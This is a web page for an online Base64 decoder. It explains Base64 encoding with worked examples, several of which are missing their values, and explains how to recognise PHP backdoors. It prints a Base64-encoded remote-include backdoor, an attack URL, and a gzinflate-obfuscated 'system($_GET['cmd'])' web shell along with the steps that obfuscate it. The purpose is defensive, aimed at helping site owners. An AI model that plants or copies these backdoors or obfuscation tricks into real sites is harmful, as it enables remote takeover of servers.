Base64 Decoder - Encoder.

This base64 online decoder tool allows you to encode the text to ASCII characters and decode Base64 online. Base64 decode / encode most commonly used in e-mail protocols to transfer binary data such as files and pictures. Also spammers and hackers make use of base64 decode option to hide the content of their scripts or messages from simple antispam or antivirus programs, filters or from people eyes.

To encode or decode base64 online, just paste your string in the textarea.

If you need to decode eval(gzinflate(base64_decode, please scroll down this page and use gzinflate decoder.

Base64 decode | encode

How base64 encoding works?

Base64 encode example A.

× Let's begin with a string "Base64"

× Hexadecimal representation:

× Binary representation: Binary converter

01000010

01100001

01110011

01100101

00110110

00110100

× Now we need to split the result in groups of 6 bits.

010000

100110

000101

110011

011001

010011

011000

110100

× Next, convert the groups of 6 bits into decimal representation.

× Now we can use the base64 encoding table to convert the decimal values
into base64 equivalent.

Base64 encode example B.

× We will split the string "Base64" into two smaller strings: "Ba" and "se64" and encode it into Base64.
So, we have:

× Hexadecimal representation:

× Binary representation:

01000010

01100001

× We can split it in two groups of 6 bits. But the last group is only 4 bits long,
so we need to add two extra bits of '0' and remember it by putting a '=' at the end.

010000

100110

000100

× In decimal:

× Base64 encoded equivalent:

Base64 encode example C.

× Hexadecimal representation:

× Binary representation:

01110011

01100101

00110110

00110100

× Splitted in groups of 6 bits. The last group contains only two bits.
Because of this we need to add four extra bits of '0' and put two '=' at the end.

011100

110110

010100

110110

001101

000000

× Base64 encoded string will be:

A==

Base64 encoding table.

Eval base64_decode.

Eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs=")); What it means? If you found something like this in the code of your website, most probably your site is hacked. This is a kind of backdoor in your site. Decoded from Base64 it will be

if(isset($_GET["cmd"]))include $_GET["cmd"];

An attacker can execute own scripts in the content of your website. He can do it like this

http://www.yoursite.com/index.php?cmd=http://www.somesite.com/somescript.txt

Somescript.txt can contain a code like this system("dir"); where "dir" is a command that will be executed.

Fortunately attacker do not think about the fact that he uses method GET, so you can see in the webserver logs what he did exactly.

If you found it in your site first of all change your passwords, check file rights (that should be 644), newer use the same passwords for database and FTP, bacause the database password most commonly stored in plain-text. Do not use shared hosting, bacause if one website located on shared hosting is hacked, it is simple to hack any other website located at same server.

Decode eval gzinflate base64_decode.

Base64 decoder above will show something like this

when you try to decode this php web shell

<?php
eval(gzinflate(base64_decode('K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=')));
?>

It's so, because this code was first compressed using gzdeflate and compressed data was encoded into base64. The script above will decode, decompress an execute obfuscated part of code.

Example below illustrate that kind of code obfuscation:

$ob='system($_GET[\'cmd\']);';

// Original // system($_GET['cmd']);

$gzcompressed = base64_encode(gzdeflate($ob));

// Obfuscated // K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=

$gzcompressed1 = base64_encode(gzdeflate($gzcompressed));

// Obfuscated two times // 8zYzKfbJzvMzDHP2SjFO9ssMiwqoyjYMyrIMN3BKd7QFAA==

$decompressed1 = gzinflate(base64_decode($gzcompressed1));

// Deobfuscated one time // K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=

$decompressed = gzinflate(base64_decode($decompressed1));

// Deobfuscated two times // system($_GET[\'cmd\']);

To decode gzinflate base64_decode construction automatically, paste your code below included php tags.

Base64 tools:

Base64 decoder - encoder. How base64 encoding works.
Gzinflate decode. Decode eval gzinflate encoding.
Image to base64, image from base64. Image base64 encoder. Image base64 decode.
Decimal to binary, binary to decimal. Convert decimal to binary, binary to decimal.
Hexadecimal converter. Convert decimal to hexadecimal, binary, octal.
Hash generator. Generate MD5, SHA1, SHA256 and other hashes.
Colored QR code generator.
Cisco password cracker. Decrypt Cisco 7 and Cisco VPN passwords.
MAC address lookup. Mac address database. MAC address range lookup.
MD5 hash decryptor. Crack MD5 passwords.
IP address whois lookup. Information about an ip address.
IP address range lookup. Find ISP ip address ranges.
TCP - UDP port checker. Check if port is open.

Google